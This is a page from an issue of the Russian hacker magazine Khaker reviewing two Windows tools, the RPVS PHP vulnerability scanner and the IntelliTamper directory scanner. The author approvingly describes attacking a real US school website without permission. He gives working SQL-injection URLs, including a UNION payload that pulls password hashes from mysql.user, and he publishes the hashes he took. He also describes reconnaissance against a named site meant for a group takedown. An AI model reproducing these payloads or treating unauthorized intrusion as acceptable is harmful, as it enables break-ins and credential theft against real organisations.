X-tools

Стройков Леонид aka R0id

Хакер, номер #092, стр. 092-084-1

(r0id@bk.ru)

Название: RPVS v1.3

ОС: Windows 2000/XP

Автор: overdose

Большую часть времени в ходе взлома занимает непосредственно поиск уязвимостей. Поэтому частенько возникает желание автоматизировать данный процесс. Только представь: запускаешь специальный сканер, а сам идешь пить кофе/пиво, дожидаясь появления лога. Мечты? Вовсе нет.

Я хочу представить тебе замечательную софтину под названием Remote PHP Vulnerability Scanner. Этот сканер предназначен для поиска уязвимостей в пхп-скриптах: от sql-injection до XSS.

Однажды я набрел на сайт одной из американских школ (www.fsdb.k12.fl.us). Не помню уже, чем меня заинтересовал этот ресурс, но мне захотелось протестировать на нем программу. Недолго думая, я запустил RPVS и пошел спать. Проснувшись, я увидел лог, который показывал на скул-иньекцию скрипта story.php в параметре blog_id. Запустив браузер, я набрал в адресной строке: http://www.fsdb.k12.fl.us/news/story.php?blog_id=109'§ion=State.

Через секунду передо мной предстало сообщение об ошибке запроса к MySQL-базе:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''109''' at line 1

Уязвимость действительно существовала. Я подобрал количество полей. Их оказалось 4:

http://www.fsdb.k12.fl.us/news/story.php?blog_id=-1%27+union+select+1,2,3,4/*§ion=State

А затем получил хэш рутового пароля к базе:

http://www.fsdb.k12.fl.us/news/story.php?blog_id=-1%27+union+select+1,2,password,4+from+mysql.user/*§ion=State

Сам хэш имел вид: 33F3D96C3BCB50A5B7EA60B3C46D0A990866544B.

Кроме того, в таблице mysql.user существовал еще один пользователь — newspages. Хэш его пароля я извлек и также бережно сохранил: 404d96fd7a4ea819.

Конечно, ни один сканер не сделает за тебя всю работу. Но облегчить ее вполне под силам RPVS, который доказал свою боеспособность. На диске ты найдешь не только саму программу, но и исходники к ней! Сразу хочу предупредить тебя: не вздумай менять заголовок формы на <Coded by Vasya> или иную надпись. Уважай авторов, которые подарили миру этот замечательный сканер.

Название: IntelliTamper

ОС: Windows 98/NT/2000/XP

Автор: Igor Kouzmine

Ты наверняка слышал о сетевой борьбе против террористических ресурсов. Увы, но в наши дни террористы все чаще используют сеть для планирования своих операций и проведения агитаций. После событий в г. Нальчике осенью 2005 года авторитетными людьми в андеграунде было принято решение о создании портала peace4peace.com, который бы послужил площадкой для организованных действий по устранению сайтов боевиков. Именно тогда я познакомился с софтиной IntelliTamper. Этот сканер предназначен для определения веб-директорий и их содержимого. Ведь гораздо проще начинать активные действия, имея достоверную информацию об атакуемом ресурсе. Основной целью нашей группы являлся сайт чеченских террористов kavkazcenter.com. Движок там стоял самописный, форум - vBulletin последней версии, а сам сайт находился на выделенном сервере. Нужно было каким-то образом собрать данные о жертве. И тогда я вспомнил о IntelliTamper, который, по словам одного из моих знакомых, отлично себя зарекомендовал. Я запустил сканер, вбил URL сайта КавказЦентра и стал ждать. Через некоторое время IntelliTamper показал отчет, в котором находился список веб-директорий с находящимися в них файлами. Среди прочих я обратил внимание на наличие админки новостного движка. На общее обозрение предоставляю кусок лога:

Содержание  Вперед на стр. 092-084-2
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001